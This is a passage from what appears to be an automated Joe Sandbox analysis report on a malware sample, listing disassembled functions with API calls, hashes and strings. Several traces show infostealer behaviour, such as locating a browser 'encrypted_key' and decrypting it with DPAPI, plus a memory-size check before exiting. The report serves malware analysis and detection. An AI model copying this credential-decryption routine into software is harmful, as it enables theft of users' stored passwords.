                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                          • String ID:
                                                                                          • API String ID: 2311089104-0
                                                                                          • Opcode ID: 2dddbfb2c0619b2a6c579a249d01c1d9c1681de6d9b22ca5e1b21f04b3ff7f38
                                                                                          • Instruction ID: 9a616c59c25f48dda5b41b64f2eda75996ce8e2783f016847e561ac14b63f668
                                                                                          • Opcode Fuzzy Hash: 2dddbfb2c0619b2a6c579a249d01c1d9c1681de6d9b22ca5e1b21f04b3ff7f38
                                                                                          • Instruction Fuzzy Hash: 5D310AB4A00209EFDB24CF95C895BAE7BB5BF48314F108169E911A73D0D778AD41CFA5
                                                                                          Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                          • __aulldiv.LIBCMT ref: 00401258
                                                                                          • __aulldiv.LIBCMT ref: 00401266
                                                                                          • ExitProcess.KERNEL32 ref: 00401294
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                          • String ID: @
                                                                                          • API String ID: 3404098578-2766056989
                                                                                          • Opcode ID: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
                                                                                          • Instruction ID: 3a295e2926d3a661784167dae5cc93d3585e5da9a2cb48fc087cd8b2851d2611
                                                                                          • Opcode Fuzzy Hash: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
                                                                                          • Instruction Fuzzy Hash: 8601FBB0D40308BAEB10EBE4DD49B9EBB78AB14705F20809EEA05B62D0D7785585875D
                                                                                          Function 00409D30 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
                                                                                            • Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
                                                                                            • Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
                                                                                            • Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
                                                                                            • Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
                                                                                            • Part of subcall function 00409A10: CloseHandle.KERNEL32(000000FF), ref: 00409AEA
                                                                                            • Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2
                                                                                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D89
                                                                                            • Part of subcall function 00409B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B3F
                                                                                            • Part of subcall function 00409B10: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 00409B51
                                                                                            • Part of subcall function 00409B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B7A
                                                                                            • Part of subcall function 00409B10: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 00409B8F
                                                                                          • memcmp.MSVCRT ref: 00409DE2
                                                                                            • Part of subcall function 00409BB0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BD4
                                                                                            • Part of subcall function 00409BB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BF3
                                                                                            • Part of subcall function 00409BB0: memcpy.MSVCRT ref: 00409C16
                                                                                            • Part of subcall function 00409BB0: LocalFree.KERNEL32(?), ref: 00409C23
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                                                          • String ID: $"encrypted_key":"$DPAPI
                                                                                          • API String ID: 3731072634-738592651
                                                                                          • Opcode ID: c5d85001ada9da0948c4e6a5f2fc00b447c755276a666ca92b756a4a65e0b23d
                                                                                          • Instruction ID: 7f392d33d6ad21de2d61bb21213a98381b23072c845d074b64d64ac31095145a
                                                                                          • Opcode Fuzzy Hash: c5d85001ada9da0948c4e6a5f2fc00b447c755276a666ca92b756a4a65e0b23d
                                                                                          • Instruction Fuzzy Hash: 7A3150B5D00108ABCB04DBE4DC45AEF77B8AF48304F44856AE915B3282E7789E44CBA5
                                                                                          Function 6CA3C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemInfo.KERNEL32(?), ref: 6CA3C947
                                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CA3C969
                                                                                          • GetSystemInfo.KERNEL32(?), ref: 6CA3C9A9
                                                                                          • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CA3C9C8
                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CA3C9E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$AllocInfoSystem$Free
                                                                                          • String ID:
                                                                                          • API String ID: 4191843772-0
                                                                                          • Opcode ID: d397259f1f018d44d4574f90d973e2c594b0f91bb567239138ad31ce486afa10
                                                                                          • Instruction ID: 4c70814394e8b2edadd75668344cf3a4b644652df80fba201a31ee90c683d099
                                                                                          • Opcode Fuzzy Hash: d397259f1f018d44d4574f90d973e2c594b0f91bb567239138ad31ce486afa10
                                                                                          • Instruction Fuzzy Hash: 41212F3174133A5BD7195AE4EC94BAE7379BB4A708F51421DF907E7A40D7305C448790
                                                                                          Function 004178A0 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178D7
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 004178DE
                                                                                          • RegOpenKeyExA.KERNEL32(80000002,007F6220,00000000,00020119,?), ref: 004178FE
                                                                                          • RegQueryValueExA.KERNEL32(?,0081B678,00000000,00000000,000000FF,000000FF), ref: 0041791F
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00417932
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3466090806-0
                                                                                          • Opcode ID: d4f8544a164a9437c7f2146de9882181f67f3b24d4450b32dfc713e681060546
                                                                                          • Instruction ID: 7b98265181db112957e654b40feb51e707849e62a0e01f8308d40af4a82c50e7
                                                                                          • Opcode Fuzzy Hash: d4f8544a164a9437c7f2146de9882181f67f3b24d4450b32dfc713e681060546
                                                                                          • Instruction Fuzzy Hash: EB11C1B1A04605AFDB10CF84DD4AFBFBB79FB48B10F10411AF605A7280D7785805CBA5
                                                                                          Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                                                          • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                                                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3466090806-0
                                                                                          • Opcode ID: b8563e144584e458f87bf561f54c88dffa2f1145a5d88f54fd71737305c450da
                                                                                          • Instruction ID: 190bc7a1a7c8d7045dc387aced5cbf31aaec2b72b8248f43f4a0638ea244b090
                                                                                          • Opcode Fuzzy Hash: b8563e144584e458f87bf561f54c88dffa2f1145a5d88f54fd71737305c450da
                                                                                          • Instruction Fuzzy Hash: 34013179A40208BFDB10DFE0DC49FAEB779FF48710F108158FA05A7290D6709A05CB50
                                                                                          Function 00410580 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • StrCmpCA.SHLWAPI(00000000,00816C00), ref: 004105DA
                                                                                          • StrCmpCA.SHLWAPI(00000000,00816C60), ref: 004106A6
                                                                                          • StrCmpCA.SHLWAPI(00000000,00816D40), ref: 004107DD
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy
                                                                                          • String ID: @ZA
                                                                                          • API String ID: 3722407311-3461648394
                                                                                          • Opcode ID: b56a38c1a86f14c078ddccb29e1b24db0119f1c02980400aedfc514347e3491c
                                                                                          • Instruction ID: dd73e37cf26ee0a5b727ab7f8fa236140303cf2c4538d3aa2ff7e25b79bad790
                                                                                          • Opcode Fuzzy Hash: b56a38c1a86f14c078ddccb29e1b24db0119f1c02980400aedfc514347e3491c
                                                                                          • Instruction Fuzzy Hash: E6917775B002089FCB28EF65D995FED7775BF94304F00812EE8099F291DB349A59CB86
                                                                                          Function 004105A5 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • StrCmpCA.SHLWAPI(00000000,00816C00), ref: 004105DA
                                                                                          • StrCmpCA.SHLWAPI(00000000,00816C60), ref: 004106A6
                                                                                          • StrCmpCA.SHLWAPI(00000000,00816D40), ref: 004107DD
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy
                                                                                          • String ID: @ZA
                                                                                          • API String ID: 3722407311-3461648394
                                                                                          • Opcode ID: ee895e584097aec2a6515aa658e799b262a169dafd9e9c2cc9f00a3ca233f608
                                                                                          • Instruction ID: 4e5c4e7109811dd04489307e57989d734427ebddea2fc0f69e8a4a25ed86313c
                                                                                          • Opcode Fuzzy Hash: ee895e584097aec2a6515aa658e799b262a169dafd9e9c2cc9f00a3ca233f608
                                                                                          • Instruction Fuzzy Hash: 82819775B002089FCB28EF65D995EEDB7B5FF94304F10812DE8099F251DB34AA45CB86
                                                                                          Function 00409FF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetEnvironmentVariableA.KERNEL32(00816A10,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040FF93), ref: 0040A00D
                                                                                          • LoadLibraryA.KERNEL32(007EAF30,?,?,?,?,?,?,?,?,?,?,?,0040FF93), ref: 0040A096
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00816A50,?,004210DC,?,00000000), ref: 0041A1FB
                                                                                            • Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • SetEnvironmentVariableA.KERNEL32(00816A10,00000000,00000000,?,00421290,?,0040FF93,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00420AE6), ref: 0040A082
                                                                                          Strings
                                                                                          • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040A002, 0040A016, 0040A02C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                          • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                          • API String ID: 2929475105-1193256905
                                                                                          • Opcode ID: a6ed7959de25b79cdb3bb5cb1e9ff1b97d18116cea63182b13b5717ab70b1157
                                                                                          • Instruction ID: 756634b6078292b8205bba75648758324288abb3cd7bb3e0efd9893355994f5a
                                                                                          • Opcode Fuzzy Hash: a6ed7959de25b79cdb3bb5cb1e9ff1b97d18116cea63182b13b5717ab70b1157
                                                                                          • Instruction Fuzzy Hash: 8D41E471804604AFC724EFB4EC56BAE3776BF48324F15512EF405A32A0D7B85986CB97
                                                                                          Function 0040A1B0 Relevance: 6.4, APIs: 4, Instructions: 360filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 00418600: GetSystemTime.KERNEL32(?,007F1C10,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626
